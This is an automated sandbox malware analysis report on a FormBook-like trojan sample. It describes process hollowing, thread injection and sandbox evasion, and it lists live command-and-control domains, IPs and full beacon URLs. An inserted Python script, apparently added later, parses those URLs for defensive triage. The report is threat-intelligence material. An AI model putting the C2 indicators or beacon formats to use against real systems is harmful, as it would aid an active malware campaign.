          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Native API1; Shared Modules1; At (Linux); At (Windows); Cron; Launchd
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Privilege Escalation: Process Injection512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Virtualization/Sandbox Evasion3; Process Injection512; Deobfuscate/Decode Files or Information1; Obfuscated Files or Information3; Software Packing11; Steganography
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Security Software Discovery131; Virtualization/Sandbox Evasion3; Process Discovery2; Remote System Discovery1; File and Directory Discovery2; System Information Discovery13
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Archive Collected Data1; Clipboard Data1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel1; Ingress Tool Transfer3; Non-Application Layer Protocol3; Application Layer Protocol13; Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Impact: System Shutdown/Reboot1; Device Lockout; Delete Device Data

          Behavior Graph

          [Behavior graph rendered as an image on the original page. Behavior Graph ID: 433078, Sample: KY4cmAI0jU.exe, Startdate: 11/06/2021, Architecture: WINDOWS, Score: 100. Information recoverable from the graph:]

          • Root signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures. Root DNS nodes: www.sciencebasedmasks.com, www.baliholisticacademy.com
          • KY4cmAI0jU.exe (started): drops C:\Users\user\AppData\Local\...\System.dll (PE32); Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • KY4cmAI0jU.exe (second instance, started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected): www.meganfantastic.com 45.195.169.197, 49750, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles; www.ladorreguita.com 173.234.255.253, 49737, 80 LEASEWEB-USA-LAX-11US United States; 11 other IPs or domains; System process connects to network (likely due to code injection or exploit)
          • help.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started) with child conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          KY4cmAI0jU.exe | 35% | Virustotal |
          KY4cmAI0jU.exe | 23% | Metadefender |
          KY4cmAI0jU.exe | 41% | ReversingLabs | Win32.Backdoor.Mokes
          KY4cmAI0jU.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.help.exe.3407960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.KY4cmAI0jU.exe.2170000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.KY4cmAI0jU.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          1.1.KY4cmAI0jU.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.KY4cmAI0jU.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.help.exe.9fd7e8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.0.KY4cmAI0jU.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          1.0.KY4cmAI0jU.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

          Domains

          Source | Detection | Scanner | Label
          www.rentcafecloudflaremvccn.com | 0% | Virustotal |


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.143.65.214 | true | false | | high
          www.baliholisticacademy.com | 192.185.0.218 | true | false | | unknown
          www.take-me-bergen.com | 172.67.206.33 | true | true | | unknown
          www.meganfantastic.com | 45.195.169.197 | true | true | | unknown
          www.rentcafecloudflaremvccn.com | 104.18.193.20 | true | true | | unknown
          www.candydulce.com | 104.21.89.72 | true | true | | unknown
          www.ezonkorea.com | 3.34.12.41 | true | true | | unknown
          www.ladorreguita.com | 173.234.255.253 | true | true | | unknown
          dndemystified.com | 107.180.57.111 | true | true | | unknown
          www.starflexacademy.com | unknown | unknown | true | | unknown
          www.dndemystified.com | unknown | unknown | true | | unknown
          www.insurancedowntown.com | unknown | unknown | true | | unknown
          www.obi4ex.com | unknown | unknown | true | | unknown
          www.sciencebasedmasks.com | unknown | unknown | true | | unknown

                                    Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.dndemystified.com/sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.meganfantastic.com/sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.insurancedowntown.com/sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.ladorreguita.com/sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          www.alberthospice.com/sh2m/ | true | Avira URL Cloud: safe | low
          http://www.candydulce.com/sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.ezonkorea.com/sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown
          http://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L | true | Avira URL Cloud: safe | unknown

                                    URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | KY4cmAI0jU.exe | false | | high
                                                    http://www.goodfont.co.krexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carterandcone.comlexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.netDexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://fontfabrik.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorKY4cmAI0jU.exefalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.fonts.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.89.72 | www.candydulce.com | United States | 13335 | CLOUDFLARENET (US) | true
104.18.193.20 | www.rentcafecloudflaremvccn.com | United States | 13335 | CLOUDFLARENET (US) | true
107.180.57.111 | dndemystified.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true
173.234.255.253 | www.ladorreguita.com | United States | 395954 | LEASEWEB-USA-LAX-11 (US) | true
172.67.206.33 | www.take-me-bergen.com | United States | 13335 | CLOUDFLARENET (US) | true
3.143.65.214 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02 (US) | false
45.195.169.197 | www.meganfantastic.com | Seychelles | 132839 | POWERLINE-AS-AP POWERLINE DATACENTER (HK) | true
3.34.12.41 | www.ezonkorea.com | United States | 16509 | AMAZON-02 (US) | true
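The C2 URLs listed in this report share one campaign directory ("sh2m") and one short second query key ("4huxZr"), and text extraction has fused the report's Malicious column ("true"/"false") onto the end of every URL. The Python below is an added triage example, not part of the Joe Sandbox report and not FormBook's own code: it splits the fused flag back out, parses each URL, marks rows as beacon candidates either by the campaign token or by a two-parameter query shape (one long base64-like blob, one short value), and joins each host to the Contacted IPs table. The sample rows are copied from the tables above; the campaign token, the 40-character length threshold and the "beacon shape" rule are assumptions drawn from these rows, not a FormBook specification.

```python
import re
from urllib.parse import urlsplit

# Rows copied from the URL tables of this report. The trailing "true"/"false"
# is the report's Malicious column, fused onto the URL by text extraction.
URL_ROWS = [
    "www.alberthospice.com/sh2m/true",
    "http://www.candydulce.com/sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3Ltrue",
    "http://www.ezonkorea.com/sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3Ltrue",
    "http://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3Ltrue",
    "http://www.apache.org/licenses/LICENSE-2.0false",
    "http://www.fontbureau.com/designersfalse",
    "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssfalse",
]

# Domain -> (IP, malicious), copied from the Contacted IPs table of this report.
CONTACTED_IPS = {
    "www.candydulce.com": ("104.21.89.72", True),
    "www.take-me-bergen.com": ("172.67.206.33", True),
    "www.ezonkorea.com": ("3.34.12.41", True),
    "prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com": ("3.143.65.214", False),
}

FLAG_RE = re.compile(r"(.*?)(true|false)")
B64ISH_RE = re.compile(r"[A-Za-z0-9+/=_-]+")


def split_row(row):
    """Separate the fused Malicious flag from the URL text.
    Returns (url, flag); flag is None when the row carries no flag."""
    m = FLAG_RE.fullmatch(row)
    if m is None:
        return row, None
    return m.group(1), m.group(2) == "true"


def parse_query(query):
    """Split the query by hand: urllib's parse_qsl turns '+' into a space,
    which would corrupt base64-like values."""
    out = {}
    if query:
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            out[key] = value
    return out


def parse_url(url):
    """Return host, first path segment (the campaign directory) and query."""
    if "://" not in url:
        url = "http://" + url  # scheme-less rows appear in the report as-is
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    return {
        "url": url,
        "host": parts.hostname or "",
        "campaign": segments[0] if segments else "",
        "query": parse_query(parts.query),
    }


def is_beacon_shape(info, min_len=40):
    """Assumption drawn from this report's rows: exactly two query
    parameters, the first a long base64-like blob, the second short."""
    values = list(info["query"].values())
    if len(values) != 2:
        return False
    first, second = values
    return (len(first) >= min_len
            and B64ISH_RE.fullmatch(first) is not None
            and len(second) <= 16)


def triage(rows, contacted, campaign="sh2m"):
    """Split rows into (beacons, other). A row is a beacon candidate when its
    campaign directory matches or its query has the beacon shape; beacons get
    the IP from the contacted-IP table (None when the host did not resolve)."""
    beacons, other = [], []
    for row in rows:
        url, flagged = split_row(row)
        info = parse_url(url)
        info["flagged"] = flagged
        if info["campaign"] == campaign or is_beacon_shape(info):
            info["ip"] = contacted.get(info["host"], (None, None))[0]
            beacons.append(info)
        else:
            other.append(info)
    return beacons, other


if __name__ == "__main__":
    beacons, other = triage(URL_ROWS, CONTACTED_IPS)
    for b in beacons:
        print("C2 candidate:", b["host"], b["campaign"], b["ip"], b["query"])
    print(len(other), "non-beacon URLs (font vendors, licence text, CDN)")
```

The campaign token and query keys rotate between FormBook builds, so the token match is only useful for this sample set; the shape rule is what carries over to other reports, and its thresholds should be tuned against the URLs actually seen.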

                                                              General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433078
Start date: 11.06.2021
Start time: 09:00:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 13s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: KY4cmAI0jU.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@13/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.2% (good quality ratio 22%)
• Quality average: 75.2%
• Quality standard deviation: 30.5%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 20.82.210.154, 23.218.208.56, 8.238.30.254, 8.238.85.126, 8.241.126.249, 8.238.28.254, 8.238.85.254, 92.122.213.194, 92.122.213.247, 20.50.102.62, 20.54.26.129, 92.122.145.220, 104.21.89.254, 172.67.150.126
• Excluded domains from analysis (whitelisted): www.sciencebasedmasks.com.cdn.cloudflare.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

Match | Associated Sample Name / URL | Detection | Context
3.143.65.214 | New Order Vung Ang TPP Viet Nam.exe | malicious | www.honestfind.com/un8c/?m6=ttrozPO2fCY4HABnjt4KyaVHjwA7V0TtNu2qTCNkPssR21w9Sg0RX1LnPvL6CB+p5ZV1rRPS2w==&z8b=iZspkzE0JnS86
3.143.65.214 | 6dTTv9IdCw.exe | malicious | www.painhut.com/p2io/?vPqT4=6lnLSRg0&G0Dp=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BUbJiBa321YLUv6f4A==
3.143.65.214 | QyKNw7NioL.exe | malicious | www.painhut.com/p2io/?m4=PditjTvx4PwX_x-&aBd=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BUXJxRW0vlYd
3.143.65.214 | Descripciones de oferta de productos MACIILIAS SRL doc.exe | malicious | www.ryanscode.com/ftgq/?FTChJZL=23JWsXMNU3B901upE30epEJ3klQjQSAbj7e94TDSIuOB/RvSwvTb1tco95KnMzdjPkxzNHr8OA==&vRiDu=khOtRFfxvlNlUv7
3.143.65.214 | New order 301534.pdf.exe | malicious | www.infooro.com/sbqi/?ZjR=1b5JUoDV2ITPMK/1rKvz5BlJOGiJqGjXGFGHUzRwz75T2RYjCnVbOWbU3HBy3iWt/ycywG3p/A==&ndnddT=ot9xbpDpf8H4
45.195.169.197 | L2.xlsx | malicious | www.meganfantastic.com/sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn

                                                              Domains

Match | Associated Sample Name / URL | Detection | Context
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | DNPr7t0GMY.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | SecuriteInfo.com.Trojan.Packed2.43183.29557.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Letter 09JUN 2021.xlsx | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PO#78765439.ZIP.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | New Order Vung Ang TPP Viet Nam.exe | malicious | 3.143.65.214
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PROFORMA FATURA PDF.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 6dTTv9IdCw.exe | malicious | 3.143.65.214
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | Telex_Payment.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | STATEMENT.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | QyKNw7NioL.exe | malicious | 3.143.65.214
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | SKMBT41085NC9.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | CC for account.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | CARGO ARRIVAL NOTICE-MEDICOM AWB.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | statement.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | CONTRACT SWIFT.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | RE; KOC RFQ for Flangers - RFQ 22965431.exe | malicious | 52.14.32.15
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | PO 0003789311.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | tgb4.exe | malicious | 13.59.53.244
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | transferencia bancaria.exe | malicious | 52.15.160.167
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | SHIPPING DOCUMENT_7048555233PDF.exe | malicious | 3.143.65.214
www.rentcafecloudflaremvccn.com | dwg.exe | malicious | 104.18.194.20
www.meganfantastic.com | L2.xlsx | malicious | 45.195.169.197

                                                              ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENET (US) | w1iSiwLXiV.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | TKeRmCuiit.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | c71fd2gJus.exe | malicious | 172.67.222.38
CLOUDFLARENET (US) | BrBsL8sBvm.exe | malicious | 172.67.188.69
CLOUDFLARENET (US) | New Order PO2193570O1.doc | malicious | 162.159.134.233
CLOUDFLARENET (US) | Proforma Invoice.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | 00010200390_0192021.pdf.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | Payment Advice.pdf.doc | malicious | 104.21.19.200
CLOUDFLARENET (US) | Urgent Contract Order GH7856648,pdf.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | bL6FwQU4K5.exe | malicious | 172.67.163.99
CLOUDFLARENET (US) | E1a92ARmPw.exe | malicious | 104.21.62.88
CLOUDFLARENET (US) | crt9O3URua.exe | malicious | 172.67.38.66
CLOUDFLARENET (US) | fuoAl0V94I.exe | malicious | 172.67.162.27
CLOUDFLARENET (US) | Consignment Details&Original BL Draft.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | E1a92ARmPw.exe | malicious | 172.67.38.66
CLOUDFLARENET (US) | 2320900000000.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | 3JDjILxXaA.exe | malicious | 172.67.154.4
CLOUDFLARENET (US) | NEW ORDER 112888#.exe | malicious | 104.21.19.200
CLOUDFLARENET (US) | Transfer-Advice000601021_PDF.exe | malicious | 172.67.188.154
CLOUDFLARENET (US) | _VM0_03064853.HtM | malicious | 104.18.10.207
                                                              AS-26496-GO-DADDY-COM-LLCUS5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                              • 192.169.223.13
                                                              5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              619wGDCTZA.exeGet hashmaliciousBrowse
                                                              • 23.229.215.137
                                                              Documents_13134976_1377491379.xlsbGet hashmaliciousBrowse
                                                              • 107.180.50.232
                                                              #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              Payment receipt MT103.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              research-531942606.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-121105165.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-76934760.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-1960540844.xlsxGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-1110827633.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                              • 148.66.138.158
                                                              New Order.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                                              • 148.66.138.158
                                                              NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              qXDtb88hht.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

Match: C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll
Associated Sample Name / URL (Detection: malicious for every entry; the SHA 256, Link and Context columns were empty in the report):
• 5t2CmTUhKc.exe
• 8qdfmqz1PN.exe
• New Order PO2193570O1.doc
• L2.xlsx
• Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
• New Order PO2193570O1.pdf.exe
• 2320900000000.exe
• CshpH9OSkc.exe
• 5SXTKXCnqS.exe
• i6xFULh8J5.exe
• AWB00028487364 -000487449287.doc
• 090049000009000.exe
• dYy3yfSkwY.exe
• PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx
• Purchase Order Price List 061021.xlsx
• Proforma Invoice and Bank swift-REG.PI-0086547654.exe
• UGGJ4NnzFz.exe
• Proforma Invoice and Bank swift-REG.PI-0086547654.exe
• 3arZKnr21W.exe
• Shipping receipt.exe

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\nssF13F.tmp
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):261012
                                                                                                      Entropy (8bit):7.3456635705707685
